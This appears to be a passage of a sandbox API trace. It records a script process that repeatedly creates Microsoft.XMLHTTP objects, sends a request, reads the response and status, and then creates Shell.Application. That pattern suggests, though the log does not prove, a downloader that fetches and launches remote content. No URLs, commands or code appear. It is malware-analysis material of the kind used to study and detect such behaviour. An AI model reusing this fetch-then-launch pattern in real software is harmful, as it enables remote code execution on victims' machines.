	[0235.088] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0235.088] SysStringLen (param_1=0x0) returned 0x0
	[0235.088] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0235.088] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0235.088] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0235.088] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0235.088] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0235.088] ??2@YAPEAX_K@Z () returned 0x62f330
	[0235.088] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f330) 
	[0235.088] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0235.088] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0235.088] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0235.088] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0235.088] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0235.088] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0235.088] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0235.088] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0235.088] SysStringLen (param_1=0x0) returned 0x0
	[0235.088] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0235.089] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0235.089] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74f0) returned 0x0
	[0235.089] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0235.089] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7208) returned 0x0
	[0235.089] ??2@YAPEAX_K@Z () returned 0x62f310
	[0235.089] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7208, pUnkSite=0x62f310) 
	[0235.089] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0235.089] XMLHTTPRequest:IUnknown:Release (This=0x49c7208) returned 0x0
	[0235.089] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74f0) returned 0x0
	[0235.089] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74f0) returned 0x3
	[0235.089] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0235.089] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74f0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0235.089] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0235.089] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0235.089] SysStringLen (param_1=0x0) returned 0x0
	[0235.089] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0235.089] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0235.089] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0235.089] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0235.089] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0235.089] ??2@YAPEAX_K@Z () returned 0x62f330
	[0235.089] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f330) 
	[0235.089] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0235.089] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0235.090] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0235.090] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0235.090] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0235.090] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0235.090] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0235.090] longjmp () 
	[0235.090] longjmp () 
	[0235.090] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0235.090] SysStringLen (param_1=0x0) returned 0x0
	[0235.090] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0235.090] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0235.090] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0235.090] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0235.090] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7208) returned 0x0
	[0235.090] ??2@YAPEAX_K@Z () returned 0x62f310
	[0235.090] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7208, pUnkSite=0x62f310) 
	[0235.090] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0235.090] XMLHTTPRequest:IUnknown:Release (This=0x49c7208) returned 0x0
	[0235.091] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0235.091] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0235.091] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0235.091] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0235.091] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0235.091] longjmp () 
	[0235.091] longjmp () 
	[0235.091] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0235.091] SysStringLen (param_1=0x0) returned 0x0
	[0235.091] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0235.091] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0235.091] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7540) returned 0x0
	[0235.091] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0235.091] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b88) returned 0x0
	[0235.091] ??2@YAPEAX_K@Z () returned 0x62f330
	[0235.091] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b88, pUnkSite=0x62f330) 
	[0235.091] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0235.092] XMLHTTPRequest:IUnknown:Release (This=0x49c5b88) returned 0x0
	[0235.092] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7540) returned 0x0
	[0235.092] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7540) returned 0x3
	[0235.092] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0235.092] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7540, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0235.092] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0235.092] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0235.092] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7540, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0235.092] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0235.356] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0235.356] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7540, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0235.356] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0235.356] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0235.357] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7540, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0235.357] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0235.357] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0235.357] SysStringLen (param_1=0x0) returned 0x0
	[0235.357] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0235.357] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0235.357] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0235.357] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0235.357] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0235.357] ??2@YAPEAX_K@Z () returned 0x62f350
